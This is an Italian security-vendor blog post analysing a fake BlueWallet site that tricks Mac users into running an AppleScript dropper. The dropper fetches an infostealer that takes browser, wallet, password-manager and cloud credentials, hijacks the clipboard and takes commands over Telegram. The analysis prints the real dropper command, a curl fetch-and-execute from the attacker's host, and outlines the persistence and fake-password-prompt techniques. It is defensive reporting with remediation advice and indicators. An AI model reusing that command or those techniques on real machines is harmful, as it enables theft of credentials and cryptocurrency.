Privacy, Truffe, Informazioni sulle minacce

Il falso BlueWallet ruba password, account e criptovalute dai Mac

di Stefan Dasic | 1 giugno 2026
Il falso BlueWallet ruba password, account e criptovalute dai Mac

Un sito web fasullo che si spaccia per BlueWallet (un vero portafoglio Bitcoin) sta prendendo di mira Mac con un attacco semplice ma efficace. BlueWallet non è stato compromesso. I criminali informatici hanno invece rubato il nome e il marchio del portafoglio Bitcoin legittimo per far download affidabile un download dannoso.

Se stavi cercando un portafoglio per criptovalute e sei finito su una di queste download fasulle di BlueWallet, il sito ha cercato di indurti ad aprire un file scaricato tramite uno strumento integrato in macOS e a premere "Esegui". Se hai seguito quelle istruzioni, il malware avrebbe potuto rubare password salvate, credenziali di accesso al browser, portafogli di criptovalute, documenti e altri dati sensibili. Inoltre, il malware monitora gli appunti alla ricerca di indirizzi di portafogli di criptovalute e può sostituirli con indirizzi controllati dall'autore dell'attacco.

Quest'ultima caratteristica è particolarmente pericolosa. Se si copia l'indirizzo di un portafoglio prima di inviare fondi, il malware può sostituirlo di nascosto con l'indirizzo dell'autore dell'attacco. Sullo schermo tutto sembra normale, ma il denaro finisce altrove.

C'è motivo di preoccuparsi? Solo se avete scaricato ed eseguito il file. Il semplice fatto di visitare la pagina e chiuderla non comporta alcun rischio. L'attacco dipende interamente dal fatto che l'utente apra lo script e clicchi su "play".

Se l'hai eseguito, considera il computer compromesso e segui i passaggi riportati di seguito.

Cosa fare se pensi di averlo eseguito

Se hai aperto il file e hai premuto "Riproduci", considera che il tuo dispositivo sia stato compromesso e segui questi passaggi:

  • Scollegare la macchina dalla rete per interrompere il canale di controllo
  • Esegui una scansione completa del dispositivo e assicurati di utilizzare un software di sicurezza aggiornato con la protezione web attivata
  • Da un altro dispositivo affidabile, modifica le password di tutti gli account utilizzati sul Mac, a partire dall'account e-mail e da quelli delle piattaforme di scambio di criptovalute
  • Trasferisci qualsiasi criptovaluta su un nuovo portafoglio creato su un dispositivo non compromesso
  • Considerare le frasi di seed e le chiavi esistenti come esposte
  • Prima di inviare criptovalute in futuro, controlla l'indirizzo di destinazione completo, carattere per carattere
  • Verifica la presenza di file sconosciuti in ~/Library/LaunchAgents
  • Cerca un oggetto nascosto .sysupd.sh caricare /tmp
  • Aggiornare le credenziali di Cloud e SSH se .ssh, .aws, o .gnupg sul computer erano presenti dei file
  • In caso di dubbio, esegui il backup dei dati e reinstalla macOS da una fonte affidabile, piuttosto che provare a eseguire una pulizia in loco

Hai preso qualcosa che non avresti dovuto?

Tecniche di ingegneria sociale

L'aspetto più interessante di questa campagna non è di natura tecnica. Gli hacker non sono riusciti a violare il Mac a eludere le misure di sicurezza di Apple. Sono riusciti invece a convincere le vittime a eseguire il malware di loro spontanea volontà.

Il sito web fasullo guida gli utenti attraverso la procedura con una download convincente, istruzioni semplici e persino una scorciatoia da tastiera. L'attacco ha successo perché la vittima si fida di ciò che vede.

Man mano che i sistemi operativi diventano più efficaci nel bloccare i software dannosi, gli hacker puntano sempre più sull'ingegneria sociale. Anziché cercare di aggirare i controlli di sicurezza, convincono le persone a ignorarli.

Ecco perché c'è un'abitudine che sta diventando sempre più importante: diffidare di qualsiasi download richieda di aprirlo in un editor di script, in un'utilità di sviluppo o in una finestra di Terminale e di premere "Esegui".

In questa campagna, è bastata una sola pressione dei tasti ⌘R per trasformare un Mac uno strumento in grado di rubare password, sottrarre fondi dai portafogli di criptovalute, intercettare i dati degli appunti e consentire l'accesso remoto.

Analisi tecnica

Fase uno: il programma per scaricare AppleScript

La pagina si trova all'indirizzo update-bluewallet[.]com, un nome di dominio abbastanza simile a quello del vero portafoglio (bluewallet.io) a dare una rapida occhiata. La prima cosa che fa la pagina è non attendere il consenso. Il suo script avvia una download con un timer di due secondi non appena la pagina viene caricata, e di nuovo se il visitatore clicca su uno dei due pulsanti.

Il file che viene salvato nella cartella "Download" si chiama BlueWallet Installer.applescript, un'estensione che la maggior parte delle persone non ha mai visto e di cui non ha alcun motivo di diffidare.

A questo punto la pagina mette in atto una mossa ingegnosa. Dopo una breve pausa, modifica il proprio testo di stato trasformandolo in istruzioni di configurazione: apri il programma di installazione, quindi premi il pulsante di riproduzione o ⌘R. Nel testo compare persino un piccolo triangolo blu di riproduzione, in modo che la formulazione corrisponda all'interfaccia reale di Script Editor che la vittima sta per vedere.

Sito web contraffatto di BlueWallet che guida la vittima nel download e nell'esecuzione dello script dannoso

La pagina guida la vittima passo dopo passo attraverso le operazioni necessarie per eseguire il file.

Sui sistemi macOS moderni, un'applicazione non firmata scaricata dal web viene messa in quarantena e controllata prima di poter essere eseguita. Uno script semplice aperto in Script Editor ed eseguito dall'utente aggira questo processo. L'utente sta infatti istruendo manualmente uno strumento Apple affidabile a eseguire del codice, quindi non c'è alcun controllo di autenticazione che possa bloccare l'operazione.

Ecco perché l'autore dell'attacco ha scelto un AppleScript anziché un'app precompilata: in questo modo l'azione rischiosa non ricade più sul sistema operativo, ma sulla vittima.

Lo script AppleScript in sé è incredibilmente breve. Una volta eliminati i commenti superflui, tra cui un numero di versione fittizio e una riga che lo definisce un “aggiornamento di Brew Install”, esegue un unico comando shell codificato in base64 e poi ordina a Script Editor di chiudersi senza salvare, cancellando così ogni traccia.

Installazione, aggiornamento e configurazione di Brew

In pratica, quel comando fa questo:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Recupera uno script secondario da un host remoto, lo salva in un file nascosto nella directory temporanea, lo rende eseguibile e lo esegue in background senza visualizzare alcun output.

La vittima non vede nulla. Il nome del file .sysupd.sh è camuffato da aggiornamento di sistema. Si tratta di un classico dropper a più fasi: la prima fase è minuscola e usa e getta, e il suo unico compito è quello di scaricare il vero payload.

Fase due: analisi del carico utile

Le prime righe descrivono il funzionamento del malware. Esso imposta umask 077 quindi tutto ciò che crea è leggibile solo dall'utente compromesso, quindi crea una directory di lavoro nascosta con nome casuale sotto /tmp proveniente da /dev/urandom.

La sua configurazione è offuscata, ma in modo non molto efficace. Una piccola funzione denominata _xd scorre una stringa esadecimale due caratteri alla volta ed esegue l'operazione XOR su ciascun byte rispetto a una chiave ripetitiva hardcoded: swckR9JCD2Uu.

Tale funzione decodifica il token del bot Telegram dello script, l'identificatore della chat, il token del comando secondario e l'URL di staging durante l'esecuzione. È sufficiente per eludere gli strumenti che cercano solo stringhe in chiaro, ma non va oltre. Poiché sia la chiave che l'algoritmo sono contenuti nel file, ogni valore codificato è completamente recuperabile.

C'è un dettaglio che salta all'occhio: il contenuto della chat Telegram decodificata e quello della chat di comando e controllo decodificata sono identici. L'autore dell'attacco sta utilizzando un unico canale Telegram sia come punto di raccolta dei dati sottratti sia come canale di controllo. Si tratta di una soluzione economica, scalabile, crittografata e che si mimetizza nel normale traffico HTTPS.

Non tutto è offuscato. Gli indirizzi utilizzati per il dirottamento degli appunti sono presenti nel file in chiaro: un indirizzo Bitcoin, un indirizzo Ethereum e un indirizzo Solana. Si tratta degli indirizzi che l'impianto sostituisce quando rileva che l'utente sta copiando l'indirizzo di un portafoglio. Poiché sono pubblici sulle rispettive blockchain, sono anche tra gli elementi più utili dell'intero campione.

Cosa ruba il malware

Le procedure di raccolta della seconda fase sono di ampio respiro. Attingono da sei grandi categorie.

1. Browser web

Lo script estrae la cronologia, i cookie, i dati di accesso e i segnalibri da una vasta gamma di browser, tra cui:

  • Browser basati su Chromium: Google Chrome , Beta, Canary e Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; e Yandex
  • Browser basati su Firefox: Firefox, Waterfox, Pale Moon, Zen e LibreWolf
  • Dati del browser nativo di macOS: cookie, cronologia e valori dei moduli di Safari

2. Portafogli di criptovalute

Questo sembra essere l'obiettivo principale della sceneggiatura.

È destinato alle applicazioni di portafoglio desktop, tra cui Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop e Tonkeeper.

Si rivolge inoltre ai portafogli sotto forma di estensioni per browser presenti in diversi ecosistemi:

  • Bitcoin: Xverse , Leather, UniSat, Alby e Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet e Slope
  • Portafogli EVM: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin e XDEFI
  • Cosmos: Keplr , Station e Cosmostation
  • Altri ecosistemi: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos e Temple

3. Gestori di password e strumenti di sicurezza

Il malware prende di mira l'archivio locale e le impostazioni di diversi gestori di password, tra cui LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt e Buttercup.

Cerca inoltre i dati relativi all'autenticazione a due fattori (2FA) e agli strumenti di autenticazione, tra cui Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS e FreeOTP.

4. App di comunicazione e social

Lo script cerca di copiare i dati della sessione e l'archivio locale di Telegram Desktop e Discord, inclusi Discord Canary e Discord PTB.

5. Strumenti per sviluppatori e cloud

Cerca le credenziali e i file di configurazione nella directory home dell'utente, tra cui:

  • Configurazioni della CLI di AWS in .aws
  • Chiavi SSH in .ssh
  • Chiavi GnuPG in .gnupg
  • Configurazioni di Kubernetes in .kube
  • File Shell e Git, tra cui .zshrc, .zsh_history, .bash_history, e .gitconfig

6. App per la produttività e file vari

Lo script copia il database locale di Apple Notes, NoteStore.sqlite.

Cerca inoltre i dati delle estensioni del browser relative agli strumenti per lo shopping e la produttività, tra cui Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist e Google Keep.

Infine, esegue una scansione delle cartelle "Desktop", "Documenti" e "Download" alla ricerca di file con estensioni quali .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, e .env, entro un limite massimo di dimensioni.

Cosa ne fa dei dati rubati

Il malware cerca di ottenere direttamente la password dell'account dell'utente. Un osascript La finestra di dialogo intitolata «Preferenze di Sistema» chiede all'utente di reinserire la password «per continuare». Lo script verifica ogni tentativo rispetto a dscl . authonly prima di salvarlo, in modo che si interrompa solo una volta ottenute credenziali valide.

Per l'esfiltrazione, archivia i dati raccolti utilizzando lo strumento integrato in macOS ditto, probabilmente perché è sempre presente, a differenza di zip. Per non superare il limite di 50 MB imposto da Telegram per i file inviati, suddivide gli archivi più grandi in parti da 49 MB con split prima di spedire ogni pezzo.

Garantisce la persistenza salvando un file plist di LaunchAgent nella cartella dell'utente ~/Library/LaunchAgents, supportato da una directory di supporto nascosta, e caricandolo con launchctl in modo che l'impianto venga eseguito nuovamente ad ogni accesso.

Il "clipboard hijack" è un loop in background in tempo reale. A clip_watch La funzione controlla costantemente gli appunti, individua i formati degli indirizzi Bitcoin, Ethereum e Solana tramite espressioni regolari, invia l'indirizzo originale al canale di comando e controllo e sovrascrive gli appunti con l'indirizzo dell'autore dell'attacco tramite pbcopy.

Ciò significa che la sostituzione avviene in modo trasparente durante il copia e incolla.

Infine, il malware può essere controllato in modo interattivo. A c2_loop interroga il bot di Telegram per i comandi e supporta una suite completa di strumenti per gli operatori:

  • /info per i dettagli del sistema
  • /exec per comandi shell arbitrari
  • /clipboard per leggere il contenuto attuale degli appunti
  • /download per estrarre file specifici
  • /exfil per rieseguire il modulo furti
  • /selfdestruct per cancellare ogni traccia

Questo rende il canale Telegram un canale di controllo remoto in tempo reale, non solo un canale unidirezionale.

Vivendo dei frutti della terra e di Telegram

Il modello è ben noto e sta diventando sempre più diffuso: affidarsi a strumenti che hanno già dimostrato la loro affidabilità.

La distribuzione sfrutta lo Script Editor di Apple. La configurazione si nasconde dietro un semplice XOR anziché dietro file binari compressi. Il canale di comando utilizza l'API Bot di Telegram, che è in grado di superare i filtri in uscita che segnalerebbero un server sconosciuto.

Nessuno di questi elementi è di per sé una novità. L'efficacia deriva dall'accostamento di componenti dall'aspetto legittimo, in modo che nessuna singola fase faccia scattare l'allarme.

Possibilità di rilevamento

In questo caso, l'attenzione non è tanto sull'esca quanto sulla tecnica in sé.

Script Editor che esegue un codice Base64 di una riga do shell script il fatto che si chiuda immediatamente è un segnale comportamentale forte e un obiettivo di rilevamento di gran lunga migliore rispetto al file monouso di primo livello. Lo stesso vale per un file nascosto /tmp/.sysupd.sh scaricato da curl e viene avviata in background.

I browser e download potrebbero gestire .applescript i file provenienti dal web vengono trattati con lo stesso scetticismo riservato agli eseguibili. Inoltre, Telegram rimane un canale di comando e controllo poco monitorato, che le segnalazioni di abusi dei token dei bot potrebbero contrastare alla fonte.

Indicatori di compromissione

Hash dei file (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Indicatori di rete

  • update-bluewallet[.]com
  • projects2026box[.]com

Indirizzi di dirottamento degli appunti

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Non ci limitiamo a segnalare le minacce, ma le eliminiamo.

I rischi per la sicurezza informatica non dovrebbero mai diffondersi al di là di un titolo di giornale. Tenete le minacce lontane dai vostri dispositivi scaricando Malwarebytes oggi stesso.

Informazioni sull'autore

Stefan Dasic

Stefan Dasic

Appassionato di soluzioni antivirus, Stefan si è occupato di test di malware e di QA di prodotti AV fin da giovane. Come parte del team di Malwarebytes , Stefan si dedica alla protezione dei clienti e alla loro sicurezza.

ULTIMI ARTICOLI

Notizie
Settimana della sicurezza

Una settimana nel mondo della sicurezza ( 25 maggio al 31 maggio)

Giugno 1, 2026

Elenco degli argomenti trattati nella settimana dal 25 al 31 maggio 2026

Podcast
Un lucchetto illustrato è montato su un'asta microfonica con onde sonore emesse dal dispositivo.

Le app di pagamento ascoltano quello che dici (Lock and Code S07E11)

Maggio 31, 2026

Questa settimana, nel podcast "Lock and Code", parliamo con Rainey Reitman della censura finanziaria che esclude gli utenti dalle principali app di pagamento.

Notizie
Logo Signal

Gli utenti di Signal sono nel mirino di attacchi di phishing finalizzati al furto di backup

Maggio 29, 2026

I criminali informatici si spacciano per il servizio di assistenza di Signal per rubare le chiavi di ripristino dei backup, ottenendo così l'accesso all'intero archivio dei messaggi delle vittime.

Articoli correlati

Icona dei collaboratori

Contribuenti

Icona del Centro per le minacce

Centro delle minacce

Icona Podcast

Podcast

Icona del glossario

Glossario

Icona delle truffe

Truffe